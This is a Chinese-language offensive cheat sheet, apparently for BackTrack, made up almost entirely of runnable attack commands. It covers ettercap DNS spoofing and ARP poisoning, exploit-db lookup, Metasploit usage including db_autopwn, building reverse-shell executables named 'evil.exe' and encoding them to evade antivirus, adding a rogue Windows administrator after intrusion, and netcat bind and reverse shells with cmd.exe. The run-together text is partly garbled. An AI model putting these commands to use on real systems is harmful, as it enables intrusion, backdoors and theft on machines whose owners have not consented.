nano /usr/local/share/ettercap/etter.dns编辑配置文件Plugins > Manage the plugins > dns_spoof 设置dns欺骗Mitm > Arp poisoning > Sniff remote connections > OK 设置ARPStart > Start sniffing 开始攻击Exploits漏洞利用:cd /pentest/exploits/exploit-db 进入目录cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞cat exploit | grep "#include"检查运行环境cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码Metasploit:svn update 升级./msfweb Web接口127.0.0.1:55555。
../msfconsole 字符下的Console。
help 帮助show <option> 显示选项search <name> 搜索名字use <exploit name> 使用漏洞show options 显示选项set <OPTION NAME> <option> 设置选项show payloads 显示装置set PAYLOAD <payload name> 设置装置show options 显示选项set <OPTION NAME> <option> 设置选项show targets 显示目标(os版本)set TARGET <target number> 设置目标版本exploit 开始漏洞攻击sessions -l 列出会话sessions -i <ID> 选择会话sessions -k <ID> 结束会话<ctrl> z 把会话放到后台<ctrl> c 结束会话jobs 列出漏洞运行工作jobs -K 结束一个漏洞运行工作show auxiliary 显示辅助模块use <auxiliary name> 使用辅助模块set <OPTION NAME> <option> 设置选项run 运行模块scanner/smb/version 扫描系统版本scanner/mssql/mssql_ping 测试mssql是否在线scanner/mssql/mssql_login 测试登录(暴力或字典)Attacker behind firewall: bind shell正向Target behind firewall: reverse shell反向Meterpreter衔接不懂dos的可以用这个:db_import_nessus_nbe 加载nessus的扫描结果db_import_nmap_xml 加载nmap的扫描结果自动化攻击流程:cd /pentest/exploit/framework3./msfconsoleload db_sqlite3db_destroy pentestdb_create pentestdb_nmap targetIPdb_hostsdb_servicesdb_autopwn -t -p -e字符接口攻击流程:./msfcli | grep -i <name>./msfcli <exploit or auxiliary> S./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E 做木马后门等:./msfpayload <payload> <variable=value> <output type>S summary and options of payloadC C languageP Perly RubyR Raw, allows payload to be piped into msfencode and other toolsJ JavaScriptX Windows executable./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe 编码处理就是做免杀:./msfencode <options> <variable=value>./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c入侵后在windows下添加管理员用户:hostname 查看主机名net users 查看用户net user 用户密码/add 添加用户net localgroup 查看工作组net localgroup administrators 查看管理员组net localgroup administrators x /add 将用户加入管理员组TFTPcp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上tftp -i 10.1.1.2 GET nc.exe下载netcat瑞士军刀attacker: 10.1.1.1target: 10.1.1.2nc -v -z 10.1.1.2 1-1024 端口扫描target: nc -lvp 4444 聊天设置(服务)attacker: nc -v 10.1.1.2 4444 聊天设置(客户)target: nc -lvp 4444 > output.txt传输文件(接受)attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)target: nc -lvp 4444 -e cmd.exe Bind shell。
attacker: nc -v 10.1.1.2 4444target:nc -lvp 4444 Reverse shell。